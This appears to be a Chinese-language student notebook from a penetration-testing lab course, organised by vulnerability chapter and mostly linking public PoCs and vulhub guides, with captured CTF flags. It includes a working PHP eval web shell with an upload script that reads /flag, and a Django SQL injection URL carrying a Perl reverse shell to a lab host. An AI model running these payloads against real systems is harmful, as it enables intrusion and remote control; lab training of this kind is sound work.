第 1 章 敏感信息泄露
敏感信息泄露
vmc{tOzofoDtYKhvrsJ2etdHpwPyQb9A7KX8}
CVE-2021-36749: Apache Druid 任意文件读取复现-腾讯云开发者社区-腾讯云 (tencent.com)
第 2 章 文件上传漏洞
PHP 文件上传
jquery-upload-file/php/upload.php at master · hayageek/jquery-upload-file (github.com)
import requests
url = 'http://10.12.153.110:32803/jquery-upload-file/php/upload.php' # Replace with the actual URL of your API endpoint
file_path = './1.php' # Replace with the actual file path you want to upload
files = {'myfile': open(file_path, 'rb')}
response = requests.post(url, files=files)
if response.status_code == 200:
print('File uploaded successfully.')
else:
print('File upload failed:', response.text)
response = requests.get('http://10.12.153.110:32803/jquery-upload-file/php/uploads/1.php?cmd=system("cat /flag");')
print(response.text)
1.php
<?php
if (isset($_REQUEST['cmd'])) {
eval($_REQUEST['cmd']);
} else {
highlight_file(__FILE__);
}
?>
$ python -u "c:\Users\sparks20\Desktop\综合实践4\1.py"
File uploaded successfully.
1.php
vmc{RnpkdnUK4jHrzaXERAQl2sS2BDg7Aoic}
JSP 文件上传
漏洞复现——weblogic 任意文件上传(cve-2018-2894) - --肆零肆 - 博客园 (cnblogs.com)
01 Work home dir:/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
02 http proxy host: ws_utc
03 http proxy port:80
JspSpy.jsp/JspSpy.jsp at master · reedinthinking/JspSpy.jsp (github.com)
upload-labs 靶场
【精选】Upload-labs 1-21 关 靶场通关攻略(全网最全最完整)_upload 靶场-CSDN 博客
第 3 章 反序列化漏洞
Java 反序列化漏洞
详细 shiro 漏洞复现及利用方法(CVE-2016-4437)_糊涂是福 yyyy 的博客-CSDN 博客
PHP 反序列化漏洞
Phpmyadmin 2.X 反序列化漏洞(WooYun-2016-199433) - whited - 博客园 (cnblogs.com)
weblogic 反序列化
第 4 章 权限绕过漏洞
Openfire 身份认证绕过
CVE-2023-32315:Openfire 身份认证绕过漏洞-腾讯云开发者社区-腾讯云 (tencent.com)
tangxiaofeng7/CVE-2023-32315-Openfire-Bypass: rce (github.com)
saltstack 权限绕过
SaltStack-Exp/exp.py at master · bravery9/SaltStack-Exp (github.com)
第 5 章 弱口令漏洞
Tomcat-pass-getshell 弱口令
【Vulfocus 漏洞复现】tomcat-cve_2017_12615_青果 @ 的博客-CSDN 博客
口令破解
Weblogic 漏洞复现攻与防系列二:Weblogic 后台密码破解与防护-腾讯云开发者社区-腾讯云 (tencent.com)
第 6 章 远程代码/命令执行漏洞
Metabase 远程命令执行漏洞
securezeron/CVE-2023-38646: POC for CVE-2023-38646 (github.com)
Weblogic 未授权远程代码执行漏洞
houqe/POC_CVE-2023-21839: CVE-2023-21839 Python 版本 (github.com)
elFinder ZIP
vulhub/elfinder/CVE-2021-32682/README.zh-cn.md at master · vulhub/vulhub (github.com)
Log4j2 漏洞利用
log4j 漏洞复现 - lalalaxiaoyuren - 博客园 (cnblogs.com)
thinkphp 远程代码执行
vulhub/thinkphp/5.0.23-rce/README.zh-cn.md at master · vulhub/vulhub (github.com)
第 7 章 模板注入漏洞
SSTI 模板注入漏洞
vulhub/flask/ssti at master · vulhub/vulhub (github.com)
第 8 章 外部实体注入漏洞
Apache Solr 外部实体注入
漏洞复现-CVE-2017-12629-RCE-solr:XXE - 铺哩 - 博客园 (cnblogs.com)
vulhub/solr/CVE-2017-12629-RCE/README.md at master · vulhub/vulhub (github.com)
缺少 demo core
第 9 章 SQL 注入漏洞
Django SQL 注入
http://10.12.153.112:33343/admin/vuln/collection/?detail__a')%3d'1' or 1%3d1 %3BCOPY%20cmd_exec%20FROM%20PROGRAM%20'perl%20-MIO%20-e%20''%24p%3Dfork%3Bexit%2Cif(%24p)%3B%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%2210%2E12%2E172%2E26%3A5555%22)%3BSTDIN-%3Efdopen(%24c%2Cr)%3B%24~-%3Efdopen(%24c%2Cw)%3Bsystem%24_%20while%3C%3E%3B'''%3B--%20
sql-labs 靶场
moveit SQL 注入
第 10 章 文件包含漏洞
librsvg XInclude 文件包含漏洞
vulhub/librsvg/CVE-2023-38633/README.md at master · vulhub/vulhub (github.com)
vmc{zgE7hBltKRLd2RaxSKFPZhX7vfizqHHq}
PHP 文件包含漏洞
通过 CVE-2014-8959 漏洞深入理解 PHP 文件包含漏洞 |NOSEC 安全讯息平台 - 白帽汇安全研究院
第 11 章 服务端请求伪造漏洞
SSRF 漏洞
[De1CTF 2019]SSRF Me - 掘金 (juejin.cn)
第 12 章 Linux 远程溢出漏洞
Linux 远程溢出漏洞
第 13 章 漏洞综合利用
CMS 代码审计
DVWA 靶场
pikachu 靶场
欢迎来到这里!
我们正在构建一个小众社区,大家在这里相互信任,以平等 • 自由 • 奔放的价值观进行分享交流。最终,希望大家能够找到与自己志同道合的伙伴,共同成长。
注册 关于